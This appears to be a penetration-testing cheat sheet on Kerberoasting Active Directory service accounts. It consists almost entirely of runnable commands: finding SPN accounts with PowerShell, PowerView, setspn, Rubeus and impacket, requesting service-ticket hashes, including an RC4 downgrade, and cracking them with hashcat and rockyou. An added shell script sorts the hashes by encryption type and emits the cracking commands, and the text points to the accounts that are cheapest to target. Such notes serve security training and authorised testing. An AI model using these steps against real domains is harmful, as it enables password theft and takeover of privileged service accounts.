Tags
KerberosAuthenticated
Identify
Windows
ActiveDirectory module in PowerShell
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Using PowerView
Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName
Using the built-in setspn (lists every SPN in the forest, computer accounts included)
setspn.exe -Q */*
Using Rubeus
.\Rubeus.exe kerberoast /stats
Linux
impacket-GetUserSPNs -dc-ip <dcip> domain.local/username
Without -request this only lists the accounts that have an SPN; you are prompted for the password of username.
Exploit
From Linux
impacket-GetUserSPNs -dc-ip <dcip> domain.local/username -request
impacket-GetUserSPNs -dc-ip <dcip> domain.local/username -request-user <target_user>
Add -outputfile <name> to write the hashes to a file instead of the terminal.
Crack hash
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
Mode 13100 is for RC4 tickets (hash starts with $krb5tgs$23$). AES-encrypted tickets need mode 19600 for AES128 ($krb5tgs$17$) or 19700 for AES256 ($krb5tgs$18$), and both crack far more slowly than RC4.
From Windows
PowerView
Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation
Rubeus
.\Rubeus.exe kerberoast /stats
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
.\Rubeus.exe kerberoast /tgtdeleg /nowrap
On Windows Server 2019 and later domain controllers the /tgtdeleg RC4 downgrade no longer works against accounts that support AES: the DC issues the service ticket with the strongest etype the account supports, so you get an AES128/AES256 ticket (hashcat mode 19600/19700) instead of RC4 (13100). RC4 tickets are still issued for service accounts that do not support AES, typically user accounts whose msDS-SupportedEncryptionTypes is unset, so those remain the cheap targets.
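The hashcat line in the Crack hash section only fits RC4 hashes, and given the AES caveat above a run against a 2019+ domain controller usually returns a mix of etypes. The POSIX shell script below is an added example, not code from the original page: it sorts a GetUserSPNs or Rubeus /nowrap hash file by its $krb5tgs$<etype>$ prefix and prints the matching hashcat command for each mode present. The sample hashes are constructed placeholders with the real $krb5tgs$ layout but made-up hex payloads; apart from sqldev, the account names, SPNs, realm and file names are assumptions.

```shell
#!/bin/sh
# Added example, not from the original page: route Kerberoast hashes to the
# right hashcat mode by encryption type. Hash prefix -> hashcat mode:
#   $krb5tgs$23$ (RC4-HMAC)         -> 13100
#   $krb5tgs$17$ (AES128-CTS-HMAC)  -> 19600
#   $krb5tgs$18$ (AES256-CTS-HMAC)  -> 19700

# Constructed sample hashes: real $krb5tgs$ layout, made-up hex payloads.
# sqldev is from the page; backupjob and websvc are hypothetical accounts.
SAMPLE_HASHES='$krb5tgs$23$*sqldev$DOMAIN.LOCAL$MSSQLSvc/sql01.domain.local:1433*$0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff
$krb5tgs$18$backupjob$DOMAIN.LOCAL$*backup/srv01.domain.local*$0123456789abcdef01234567$00112233445566778899aabbccddeeff
$krb5tgs$17$websvc$DOMAIN.LOCAL$*HTTP/web01.domain.local*$0123456789abcdef01234567$00112233445566778899aabbccddeeff'

# Print the hashcat mode for one hash line; print nothing and return 1
# for anything that is not a $krb5tgs$ hash of a known etype.
krb5tgs_mode() {
    case $1 in
        '$krb5tgs$23$'*) echo 13100 ;;
        '$krb5tgs$17$'*) echo 19600 ;;
        '$krb5tgs$18$'*) echo 19700 ;;
        *) return 1 ;;
    esac
}

# Split a hash file into <prefix>.13100 / .19600 / .19700 (lines that do
# not parse go to <prefix>.unknown) and print the modes that received at
# least one hash, space separated.
split_krb5tgs() {
    infile=$1
    prefix=$2
    rm -f "$prefix.13100" "$prefix.19600" "$prefix.19700" "$prefix.unknown"
    while IFS= read -r line || [ -n "$line" ]; do
        [ -z "$line" ] && continue
        if mode=$(krb5tgs_mode "$line"); then
            printf '%s\n' "$line" >> "$prefix.$mode"
        else
            printf '%s\n' "$line" >> "$prefix.unknown"
        fi
    done < "$infile"
    found=
    for m in 13100 19600 19700; do
        [ -s "$prefix.$m" ] && found="$found $m"
    done
    echo "${found# }"
}

# Print one hashcat command per mode present. The commands are only
# printed, so this runs without hashcat installed; pipe the output to sh
# to actually crack.
hashcat_cmds() {
    hashfile=$1
    wordlist=${2:-/usr/share/wordlists/rockyou.txt}
    for m in $(split_krb5tgs "$hashfile" "$hashfile"); do
        echo "hashcat -m $m $hashfile.$m $wordlist"
    done
}

# Demo on the constructed sample set.
demo_file=$(mktemp)
printf '%s\n' "$SAMPLE_HASHES" > "$demo_file"
hashcat_cmds "$demo_file"
rm -f "$demo_file" "$demo_file".*
```

Run it as `sh kerberoast_split.sh` to see the three commands, or replace the demo block with `hashcat_cmds ilfreight_tgs.txt | sh` against a real hash file. The RC4 file is the one worth feeding to hashcat first; the AES files are where the slow, low-yield cracking happens.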